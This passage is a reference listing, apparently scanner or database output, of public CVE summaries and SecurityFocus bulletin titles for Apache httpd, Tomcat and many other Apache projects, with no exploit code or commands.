5691| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
5692| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
5693| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
5694| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
5695| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
5696| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
5697| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
5698| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
5699| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
5700| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
5701| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
5702| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
5703| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
5704| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, disclosed on 20070724, is one such variant.
5705| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
5706| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
5707| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
5708| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
5709| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
5710| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.
5711| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
5712| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
5713| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
5714| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
5715| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
5716| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
5717| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
5718| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
5719| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
5720| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
5721| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
5722| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
5723| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
5724| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
5725| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
5726| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
5727| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
5728| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
5729|
5730| SecurityFocus - https://www.securityfocus.com/bid/:
5731| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
5732| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
5733| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
5734| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
5735| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
5736| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
5737| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
5738| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
5739| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
5740| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
5741| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
5742| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
5743| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
5744| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
5745| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
5746| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
5747| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
5748| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
5749| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
5750| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
5751| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
5752| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
5753| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
5754| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
5755| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
5756| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
5757| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
5758| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
5759| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
5760| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
5761| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
5762| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
5763| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
5764| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
5765| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
5766| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
5767| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
5768| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
5769| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
5770| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
5771| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
5772| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
5773| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
5774| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
5775| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
5776| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
5777| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
5778| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
5779| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
5780| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
5781| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
5782| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
5783| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
5784| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
5785| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
5786| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
5787| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
5788| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
5789| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
5790| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
5791| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
5792| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
5793| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
5794| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
5795| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
5796| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
5797| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
5798| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
5799| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
5800| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
5801| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
5802| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
5803| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
5804| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
5805| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
5806| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
5807| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
5808| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
5809| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
5810| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
5811| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
5812| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
5813| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
5814| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
5815| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
5816| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
5817| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
5818| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
5819| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
5820| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
5821| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
5822| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
5823| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
5824| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
5825| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
5826| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
5827| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
5828| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
5829| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
5830| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
5831| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
5832| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
5833| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
5834| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
5835| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
5836| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
5837| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
5838| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
5839| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
5840| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
5841| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
5842| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
5843| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
5844| [100447] Apache2Triad Multiple Security Vulnerabilities
5845| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
5846| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
5847| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
5848| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
5849| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
5850| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
5851| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
5852| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
5853| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
5854| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
5855| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
5856| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
5857| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
5858| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
5859| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
5860| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
5861| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
5862| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
5863| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
5864| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
5865| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
5866| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
5867| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
5868| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
5869| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
5870| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
5871| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
5872| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
5873| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
5874| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
5875| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
5876| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
5877| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
5878| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
5879| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
5880| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
5881| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
5882| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
5883| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
5884| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
5885| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
5886| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
5887| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
5888| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
5889| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
5890| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
5891| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
5892| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
5893| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
5894| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
5895| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
5896| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
5897| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
5898| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
5899| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
5900| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
5901| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
5902| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
5903| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
5904| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
5905| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
5906| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
5907| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
5908| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
5909| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
5910| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
5911| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
5912| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
5913| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
5914| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
5915| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
5916| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
5917| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
5918| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
5919| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
5920| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
5921| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
5922| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
5923| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
5924| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
5925| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
5926| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
5927| [95675] Apache Struts Remote Code Execution Vulnerability
5928| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
5929| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
5930| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
5931| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
5932| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
5933| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
5934| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
5935| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
5936| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
5937| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
5938| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
| [91736] Apache XML-RPC Multiple Security Vulnerabilities
| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
| [90482] Apache CVE-2004-1387 Local Security Vulnerability
| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
| [86399] Apache CVE-2007-1743 Local Security Vulnerability
| [86397] Apache CVE-2007-1742 Local Security Vulnerability
| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
